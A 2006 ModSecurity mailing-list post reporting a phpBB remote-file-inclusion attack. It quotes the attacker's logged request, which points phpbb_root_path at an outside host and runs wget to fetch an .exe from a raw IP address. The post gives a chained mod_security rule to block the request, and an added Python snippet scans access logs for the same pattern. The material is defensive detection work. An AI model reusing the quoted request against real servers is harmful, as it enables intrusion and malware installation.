[Modsecurity] yet another phpBB exploit
Ryan E. Helfter
rhelfter at datapipe.com
Mon Jun 26 16:56:24 EDT 2006
Not sure if this made it in yet.
Yet another phpBB bug:
"GET//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.bnfxtools.com/tool25.dat?&cmd=wget%20201.32.144.237//7936825.exe HTTP/1.1" 200 11909
The following mod_security rules now take care of this:
# WEB-PHP phpbb admin_styles.php arbitrary command attempt
SecFilterSelective REQUEST_URI "/admin_styles\.php" chain
SecFilter "phpbb_root_path="
Regards,
--
Ryan E. Helfter
UNIX Security Engineer
DataPipe Managed Hosting Services
- What It Means To Be Sure -
rhelfter at datapipe.com | http://www.datapipe.com
Tel: 201.792.1918 x300 | Fax: 201-792-3090
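
Added example, not part of the original post or of ModSecurity: a Python sketch that applies the same two-condition chain from the rule above to Apache access-log lines, so existing logs can be reviewed for this request pattern. The function names, the sample log lines and the `example.invalid` host are constructed for illustration; because it reads access logs, it only sees the query string, not request bodies.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request field of an Apache access-log line, followed by the status code.
REQUEST_RE = re.compile(r'"[A-Z]+\s*(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)

def check_line(line):
    """Return a dict describing the hit, or None if the line does not match."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # First condition of the chain: the request path names admin_styles.php.
    if "/admin_styles.php" not in unquote(path).lower():
        return None
    # Second condition: phpbb_root_path is supplied. parse_qsl URL-decodes
    # names and values, so phpbb%5Froot%5Fpath is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == "phpbb_root_path":
            return {
                "status": int(m.group("status")),  # 200 = request was not blocked
                "value": value,
                "remote": bool(REMOTE_RE.match(value)),  # value points off-host
            }
    return None

def scan(lines):
    """Return (line_number, hit) pairs for every matching line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = check_line(line)
        if hit:
            hits.append((number, hit))
    return hits

# Constructed sample lines; addresses and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2006:16:40:01 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://files.example.invalid/t.dat?&cmd=PLACEHOLDER HTTP/1.1" 200 11909',
    '192.0.2.11 - - [26/Jun/2006:16:41:12 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb%5Froot%5Fpath=./ HTTP/1.1" 403 210',
    '192.0.2.12 - - [26/Jun/2006:16:42:30 -0400] "GET /modules/Forums/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '192.0.2.13 - - [26/Jun/2006:16:43:02 -0400] "GET /modules/Forums/admin/admin_styles.php?mode=edit HTTP/1.1" 200 3301',
]

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(number, hit)
```

Hits with `remote` set and a 200 status are the ones to triage first, since the server answered them rather than rejecting them.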